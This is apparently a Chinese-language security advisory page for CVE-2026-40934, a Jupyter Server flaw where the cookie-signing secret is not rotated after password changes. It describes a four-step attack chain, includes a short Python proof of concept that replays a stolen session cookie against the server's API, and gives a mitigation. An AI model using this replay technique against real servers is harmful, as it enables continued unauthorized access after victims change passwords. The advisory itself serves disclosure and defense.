CVE-2026-40934 CVSS 6.8 中危

CVE-2026-40934 Jupyter Server 密钥未轮换漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40934

漏洞类型

会话管理错误

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jupyter Server

漏洞概述

Jupyter Server 2.17.0及更早版本中存在一处严重的安全漏洞。由于其用于签名认证Cookie的密钥被静态存储，且在用户修改密码时不会自动轮换，导致会话管理失效。攻击者若获取了用户的会话Cookie，即便用户后续修改了密码，该Cookie依然有效。这使得攻击者能够绕过认证机制，长期维持对服务器的未授权访问，严重影响共享环境下的数据安全。

技术细节

该漏洞源于Jupyter Server在处理认证Cookie时的密钥管理机制缺陷。系统将用于签名Cookie的密钥持久化存储在`~/.local/share/jupyter/runtime/jupyter_cookie_secret`静态文件中。关键问题在于，当用户执行密码修改或管理员执行密码重置操作时，服务器并未触发密钥轮换机制。这意味着，攻击者一旦通过中间人攻击、跨站脚本攻击（XSS）或日志泄露等途径获取了受害者的有效会话Cookie，即便受害者在事后修改了密码以阻断非法访问，攻击者持有的旧Cookie仍然能够通过服务器的签名验证。因为签名密钥未变，服务器会将其视为合法会话，从而允许攻击者继续维持对服务器的访问权限，严重破坏了账户的安全隔离性。

攻击链分析

STEP 1

1. 获取Cookie

攻击者通过网络嗅探、XSS攻击或日志分析等方式获取受害者的Jupyter Server会话Cookie。

STEP 2

2. 密码重置

受害者或管理员发现异常并修改密码，试图切断攻击者的访问权限。

STEP 3

3. 重放攻击

攻击者使用步骤1中获取的旧Cookie重新发送请求访问服务器。

STEP 4

4. 维持权限

由于签名密钥未轮换，服务器验证通过，攻击者成功绕过新密码认证，维持访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual PoC for CVE-2026-40934
# This script demonstrates that a captured cookie remains valid after a password reset.

target_url = "http://target-jupyter-server:8888/api/contents"

# The cookie captured by the attacker *before* the victim changed their password
stolen_cookie = "jupyter-hub-token="  

headers = {
    "Cookie": stolen_cookie
}

try:
    response = requests.get(target_url, headers=headers)
    if response.status_code == 200:
        print("[+] Exploit Successful: The stolen cookie is still valid!")
        print(f"[+] Response Data: {response.text[:100]}...")
    else:
        print("[-] Exploit Failed: The cookie is invalid or server error.")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Jupyter Server <= 2.17.0

防御指南

临时缓解措施

如果无法立即升级，建议在用户重置密码后手动删除`~/.local/share/jupyter/runtime/jupyter_cookie_secret`文件，并重启Jupyter Server服务，以强制生成新的签名密钥，从而使旧会话Cookie失效。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表